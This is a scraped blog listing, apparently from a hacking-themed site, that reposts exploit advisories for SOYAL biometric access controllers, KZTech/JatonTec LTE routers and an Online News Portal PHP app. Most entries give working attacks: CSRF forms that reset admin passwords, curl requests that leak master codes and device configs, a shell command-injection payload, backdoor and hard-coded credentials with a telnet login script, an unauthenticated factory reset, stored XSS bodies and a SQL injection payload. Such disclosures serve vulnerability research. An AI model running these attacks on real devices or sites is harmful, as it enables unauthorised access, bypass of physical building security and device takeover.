McuServer.exe C:\Program Files (x86)\701Server\McuServer.exe Everyone:F NT AUTHORITY\Authenticated Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R C:\Program Files (x86)\701Server>
  15. HireHackking

    SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: AR-727 i/CM - F/W: 5.0 AR837E/EF - F/W: 4.3 AR725Ev2 - F/W: 4.3 191231 AR331/725E - F/W: 4.2 AR837E/EF - F/W: 4.1 AR-727CM /i - F/W: 4.09 AR-727CM /i - F/W: 4.06 AR-837E - F/W: 3.03 Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: SOYAL Technology WebServer 2.0 SOYAL Serial Device Server 4.03A SOYAL Serial Device Server 4.01n SOYAL Serial Device Server 3.07n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5632 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php 25.01.2021 -- <html> <body> <form action="http://192.168.1.1/userset.cgi" method="POST"> <input type="hidden" name="pw" value="test123" /> <input type="hidden" name="pw2" value="test123" /> <input type="submit" value="Forge me!" /> </form> </body> </html> ... <html> <body> <form action="http://192.168.1.2/LoginUser.cgi" method="POST"> <input type="hidden" name="pw" value="drugtest123" /> <input type="hidden" name="pw2" value="drugtest123" /> <input type="submit" value="Forge me!" /> </form> </body> </html>
  16. HireHackking

    SOYAL Biometric Access Control System 5.0 - Master Code Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: AR-727 i/CM - F/W: 5.0 AR837E/EF - F/W: 4.3 AR725Ev2 - F/W: 4.3 191231 AR331/725E - F/W: 4.2 AR837E/EF - F/W: 4.1 AR-727CM /i - F/W: 4.09 AR-727CM /i - F/W: 4.06 AR-837E - F/W: 3.03 Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings. Desc: The controller suffers from a cleartext transmission of sensitive information. This allows interception of the HTTP traffic and disclose the Master code and the Arming code via a man-in-the-middle attack. An attacker can obtain these codes to enter into the controller's Programming mode and bypass physical security controls in place. Tested on: SOYAL Technology WebServer 2.0 SOYAL Serial Device Server 4.03A SOYAL Serial Device Server 4.01n SOYAL Serial Device Server 3.07n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5630 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php 25.01.2021 -- $ curl 'http://192.168.1.1/CtrlParam.htm' \ -H 'Authorization: Basic YWRtaW46' | \ grep -ni -B1 'masterCode\|armCode' <td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td> <td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr> <td>Arming Code (4 Digital) </td> <td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>
  17. HireHackking

    SOYAL 701 Client 9.0.1 - Insecure Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SOYAL 701 Client 9.0.1 - Insecure Permissions # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: 9.0.1 190410 9.0.1 190115 Summary: 701 Client is the user interface software for the access control system. It is used for adding and deleting tokens, setting door groups for access, setting time zones for limiting access and monitoring ingress and egress on a live system, among other things. Desc: The application suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Authenticated Users' group. Tested on: Microsoft Windows 10 Enterprise Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5634 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5634.php 25.01.2021 -- C:\Program Files (x86)\701Client>cacls client.exe C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F NT AUTHORITY\Authenticated Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R C:\Program Files (x86)\701Client>
  18. HireHackking

    KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device has several backdoors and hidden pages that allow remote code execution, overwriting of the bootrom and enabling debug mode. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5639 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php 03.02.2021 -- Older and newer models defer in backdoor code. By navigating to /syscmd.html or /syscmd.asp pages an attacker can authenticate and execute system commands with highest privileges. Old models (syscmd.asp) password: super1234 Newer models (syscmd.html) password: md5(WAN_MAC+version): $ curl -k https://192.168.1.1/goform/getImgVersionInfo {"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]} ... pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR"); if (*pcVar6 == 0) { pcVar6 = "6C:AD:EF:00:00:01"; } memset(acStack280,0,0x100); sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210"); ... psMd5Init(auStack112); psMd5Update(auStack112,local_10,local_c); psMd5Final(auStack112,uParm1); return; ... Another 2 backdoors exist using the websCheckCookie() and specific header strings. ... iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb); if (iVar2 != 0) { return 0xffffffff; } if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) && (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) { return 0xffffffff; ... if (iVar1 != 0) goto LAB_0047c304; LAB_0047c32c: WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1); LAB_0047c35c: __n = strlen(__s1); if (__n == 0) { snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log"); WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560); system(acStack1560); websWrite(iParm1,"invalid command!"); goto LAB_0047c3f8; } ... Bypass the backdoor password request and enable debug mode from within the web console: $('#div_check').modal('hide'); <--- syscmd.html g_password_check_alert.close(); <--- syscmd.asp
  19. HireHackking

    KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker can disclose sensitive and clear-text information resulting in authentication bypass by downloading the configuration of the device and revealing the admin password. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5636 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php 03.02.2021 -- $ curl -s \ -o configtest.zlib \ # Default: config.dat 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \ binwalk -e configtest.zlib ; \ cd _configtest.zlib_extracted ; \ strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \ # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device cd .. 3:Login=admin 4:Password=neotelwings 5:TelnetPwd=root123 6:GuestId=user 7:GuestPassword=user123 89:DDNSPassword= 239:auto_update_password= 279:Tr069_Password= 288:Tr069_ConnectionRequestPassword=admin 300:Tr069_STUNPassword= 339:telnetManagement=2 $
  20. HireHackking

    KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' HTTP POST parameter bypassing the injection protection filter. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5635 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php 03.02.2021 -- #JT3300V/AM3300V lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ -H "Cookie: kz_userid=admin:311139" \ -H "X-Requested-With: XMLHttpRequest" ping: bad address 'Linux' lqwrm@metalgear:~/prive$ #JT3500V lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \ -H "X-Requested-With: XMLHttpRequest" ping: bad address 'Linux' lqwrm@metalgear:~/prive$
  21. HireHackking

    KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device utilizes hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the router. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5637 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php 03.02.2021 -- Default web creds: ------------------ admin:admin123 user:user123 Telnet/SSH access: ------------------ admin:root123 === import telnetlib host="192.168.1.1" user="admin" password="root123" s=telnetlib.Telnet(host) s.read_until(b"CPE login: ") s.write(user.encode('ascii') + b"\n") s.read_until(b"Password: ") s.write(password.encode('ascii') + b"\n") s.write(b"busybox\n") print(s.read_all().decode('ascii')) s.mt_interact() s.close()
  22. HireHackking

    KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device allows unauthenticated attackers to visit the unprotected /goform/LoadDefaultSettings endpoint and reset the device to its factory default settings. Once the GET request is made, the device will reboot with its default settings allowing the attacker to bypass authentication and take full control of the system. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5642 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php 03.02.2021 -- $ curl -sk https://192.168.1.1/goform/LoadDefaultSettings success $
  23. HireHackking

    Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting # Exploit Author: Richard Jones # Date: 2021-03-18 # Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 # Multipul endpoints on the application suffer from Stored XSS injection as a user/supplier and admin. Scripts execute on page load. # One POST /pos_inv/admin/addcustomer.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------26863080316712198253766739741 Content-Length: 661 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/pos_inv/admin/customer.php Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm Upgrade-Insecure-Requests: 1 -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="name" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="address" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="contact" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="username" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741 Content-Disposition: form-data; name="password" <script>alert(`Stored XSS`)</script> -----------------------------26863080316712198253766739741-- # Two http://127.0.0.1/pos_inv/admin/supplier.php POST /pos_inv/admin/edit_supplier.php?id=4 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/pos_inv/admin/supplier.php Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm Upgrade-Insecure-Requests: 1 name=Dell+Computer+Corporation&address=%3Cscript%3Ealert%28%60Stored+XSS%60%29%3C%2Fscript%3E&contact=1-800-WWW-DELL&username=supplier&password=fa3ddb86f38fb6a8284636249f6551aa # Three http://127.0.0.1/pos_inv/admin/product.php POST /pos_inv/admin/edit_product.php?id=12 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------11435260685310908573266876009 Content-Length: 844 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/pos_inv/admin/product.php Cookie: PHPSESSID=cb9r4bs1p4mqmt98nd4o3mtavm Upgrade-Insecure-Requests: 1 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="name" ACER Aspire GX-781 Gaming PC <script>alert(1)</script> -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="category" 2 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="supplier" 0 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="price" 749.99 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="qty" 1000 -----------------------------11435260685310908573266876009 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------11435260685310908573266876009--
  24. HireHackking

    Online News Portal 1.0 - 'name' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online News Portal 1.0 - 'name' SQL Injection # Exploit Author: Richard Jones # Date: 2021-03-18 # Vendor Homepage: https://www.sourcecodester.com/php/14741/online-news-portal-using-phpmysqli-free-download-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14741&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code+Free+Download # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 # Steps # Add a new product: http://127.0.0.1/pos_inv/supplier/addproduct.php # Save request in BurpSuite # Run saved request with sqlmap -r sql.txt --- Parameter: MULTIPART name ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="name" aasd' AND (SELECT 1775 FROM (SELECT(SLEEP(5)))Jpba) AND 'EaFY'='EaFY -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="category" 1 -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="price" asd -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="qty" asd -----------------------------15280280330873390203691218429 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------15280280330873390203691218429-- ---
  25. HireHackking

    KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: JT3500V is vulnerable to unauthenticated configuration disclosure when direct object reference is made to the export_settings.cgi file using an HTTP GET request. This will enable the attacker to disclose sensitive information and help her in authentication bypass, privilege escalation and full system access. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5644 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php 03.02.2021 -- $ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat 8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat